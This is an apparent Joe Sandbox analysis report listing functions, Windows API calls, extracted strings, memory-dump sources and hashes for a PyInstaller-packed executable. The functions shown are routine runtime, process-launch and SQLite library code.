Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 9f4c7147dfa47939fd776ed0faefe9f973fa16268f0bc98a83545da7d521671b
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 44117531E1CE4182FAA09F5994001BDA666BF85B84FC44672EF4DD7B96CF3DD4008700

Function 00007FF6BA3C6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C6377

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: 0b51025a930cd07badc35c3cc97dbc5f21194d3d47be7299de1440cbcf87ece4
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 5D219232A18B8186DB618F1CD8413797AA1FB84B54F545234EF5DC76D9EF3CD4518B00

Function 00007FFDFAB0F070 Relevance: 1.6, APIs: 1, Instructions: 303COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFAB0F1C3

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
Instruction ID: 91fde6fb4607b3be07ad295b73ce13d16f6da0e5e7903db2d88e7a8e2f6de61b
Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
Instruction Fuzzy Hash: 0E21C232B0C25289E76C9A35A861A7D32A0FF10B95F9C84B5DE6D422D9DE38E841C661

Function 00007FF6BA3B03BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B0410

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 422d9f1954e68c8f767eb45eda4488e6bd0fc683700c8d32fe1718e3f714c45c
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 29018821B08F4541E904DF5A99421A9AA96FF86FE0F8847B1DF5CD7BD6DE3CD5014700

Function 00007FF6BA3A8E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9

LoadLibraryExW.KERNEL32(?,00007FF6BA3A6476,?,00007FF6BA3A336E), ref: 00007FF6BA3A8EA2

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction ID: a6826ed24978e6d76db2d190bb51fbe167198417bb337adff57f68617654cf46
Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction Fuzzy Hash: 2AD0CD11F3465541EE44A76BB95663952525F89BC0F88C075EF4D83749EC3CC0414700

Function 00007FFDFAABEF30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FFDFAABEE5D), ref: 00007FFDFAABEF61

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction ID: 75b20169d53ea6e9adb4d5144008c144a742f0770ca676f6ecbafb463341fae2
Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction Fuzzy Hash: 3D21A432B0878086D7589B22A550A6EB3A5FB84BC4F144036EB9D43F99CF3CD456CB00

Function 00007FFDFAAB1DF7 Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFAB0F1C3

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction ID: e72d552114e007bd1472c9735df93af6e7c99fd6864afc518a21d36c8c0dc9bf
Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction Fuzzy Hash: A321A431F0C25289F76CAA359460A7932D0FF11B95FACC4B1ED2D466DDCE3CE8418661

Function 00007FF6BA3BEB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6BA3BB32A,?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A), ref: 00007FF6BA3BEBED

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction ID: 8882c5eb4bd230fe5bcbe8ede7195bf55261286b9ff7d48f2077dfc522faf57c
Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction Fuzzy Hash: 68F01254B0DB1682FE5997AD98552B552965F88B40FAC47B0CF0FC63D1ED1CE4814310

Function 00007FFDFAAB204A Relevance: 1.3, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFAABF39B

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
Instruction ID: a76ebb8b56715d3b0a8619898a499cd377501ef68b861c955d3a7ca792ad6ab4
Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
Instruction Fuzzy Hash: F9F03C22B08B8185E3099B26F8106AAB264FB85FC4F584075EE9D47BEECE3CD5468700

Function 00007FF6BA3BD5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6BA3B0C90,?,?,?,00007FF6BA3B22FA,?,?,?,?,?,00007FF6BA3B3AE9), ref: 00007FF6BA3BD63A

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: 740c7bfd3d3b2ec6e199cfb04274249a64034ef9177ba3c6e438c5b73f8f8ddd
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 4CF0F810F19B4745FEA85B7A58517B912925FC47E0FC807B0DF2EC62C2EE3CA4808720

Non-executed Functions

Function 00007FF6BA3A89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8A56

Part of subcall function 00007FF6BA3BA47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BA490

Part of subcall function 00007FF6BA3B871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B8783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8AE6
CreateProcessW.KERNEL32 ref: 00007FF6BA3A8B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8B28

Part of subcall function 00007FF6BA3A2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
Part of subcall function 00007FF6BA3A2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
Part of subcall function 00007FF6BA3A2C50: MessageBoxW.USER32 ref: 00007FF6BA3A2D99

RegisterClassW.USER32 ref: 00007FF6BA3A8B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8B8B
CreateWindowExW.USER32 ref: 00007FF6BA3A8BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C15
PeekMessageW.USER32 ref: 00007FF6BA3A8C39
TranslateMessage.USER32 ref: 00007FF6BA3A8C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C51
PeekMessageW.USER32 ref: 00007FF6BA3A8C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8E04
GetExitCodeProcess.KERNEL32 ref: 00007FF6BA3A8E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6BA3A3F7F), ref: 00007FF6BA3A8E2F

Strings

Failed to create child process!, xrefs: 00007FF6BA3A8B30
PyInstaller Onefile Hidden Window, xrefs: 00007FF6BA3A8B95
CreateProcessW, xrefs: 00007FF6BA3A8B37
PyInstallerOnefileHiddenWindow, xrefs: 00007FF6BA3A8B54

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: c185ad2ac7251cea98abc6702faec32d401d285ff3d3618ac024875ed806b77b
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: 22D13E32A08B9286EB109F78E8542AD77A5FF84B58F404275EF5ED3AA4EF3CD5458700

Function 00007FFDFB1842B0 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 452COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB184834

Strings

no such vfs: %s, xrefs: 00007FFDFB1848E4
mode, xrefs: 00007FFDFB18460E
%s mode not allowed: %s, xrefs: 00007FFDFB1847EE
access, xrefs: 00007FFDFB1846F5
cach, xrefs: 00007FFDFB18461F
no such %s mode: %s, xrefs: 00007FFDFB18475E
localhos, xrefs: 00007FFDFB18440E
mode, xrefs: 00007FFDFB184791
cache, xrefs: 00007FFDFB1846CB
invalid uri authority: %.*s, xrefs: 00007FFDFB184437
cach, xrefs: 00007FFDFB1847B0
file, xrefs: 00007FFDFB18432B

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
API String ID: 2142204133-1067337024
Opcode ID: ea5b30896b8f601e2c558708f0cff121e52ec114d766bdc7e5f30d61455f35fa
Instruction ID: bf942c08fc59c41225fc3e824fdad7f47097ea268e2be274e996794ee0269138
Opcode Fuzzy Hash: ea5b30896b8f601e2c558708f0cff121e52ec114d766bdc7e5f30d61455f35fa
Instruction Fuzzy Hash: 2E020363F0EA8345FB758B149070B796A91BB52B9CF14C236CA7E436E9DE3DE4618700

Function 00007FFDFB13CF30 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 441COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB13D5A7

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB13CF95
%s at line %d of [%.10s], xrefs: 00007FFDFB13CFAE
unopened, xrefs: 00007FFDFB13CF7D
invalid, xrefs: 00007FFDFB13CF72
misuse, xrefs: 00007FFDFB13CFA2
NULL, xrefs: 00007FFDFB13CF5D
API call with %s database connection pointer, xrefs: 00007FFDFB13CF84

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 2142204133-509082904
Opcode ID: 2656ad0c0fd7523b4c1cb6d6ccb6ebaef910a3cd00626bca7a02776590651dc9
Instruction ID: 7ebe671b38e2cd385e2f76cca52bad9a6f268fe8076b13b782b9c863ebef73ca
Opcode Fuzzy Hash: 2656ad0c0fd7523b4c1cb6d6ccb6ebaef910a3cd00626bca7a02776590651dc9
Instruction Fuzzy Hash: 0112A062F0AA4B85EB548F65A4A0B7967A0FF45B88F584131DE6D476FCEF3CE4858300

Function 00007FFDFA933248 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDFA933264
00007FFE13341A90.VCRUNTIME140 ref: 00007FFDFA933288
RtlCaptureContext.KERNEL32 ref: 00007FFDFA933291
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDFA9332AB
RtlVirtualUnwind.KERNEL32 ref: 00007FFDFA9332EC
00007FFE13341A90.VCRUNTIME140 ref: 00007FFDFA93331F
IsDebuggerPresent.KERNEL32 ref: 00007FFDFA933340
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDFA93335D
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDFA933368

Memory Dump Source

Source File: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true

Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13341ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 1592948245-0
Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
Instruction ID: b9ef4eb9ea32c52a24f5b3f15222a33d19c07a46ba9964f95c47229b9e726e2b
Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
Instruction Fuzzy Hash: 02313E72708B8186EB648F61E8517EA7374FB44744F80407ADB6E87B98DF38D588C710

Function 00007FF6BA3A83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A842B
RemoveDirectoryW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84AE
DeleteFileW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84CD
FindNextFileW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84DB
FindClose.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84EC
RemoveDirectoryW.KERNEL32(?,00007FF6BA3A8919,00007FF6BA3A3FA5), ref: 00007FF6BA3A84F5

Strings

%s\*, xrefs: 00007FF6BA3A83F2

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
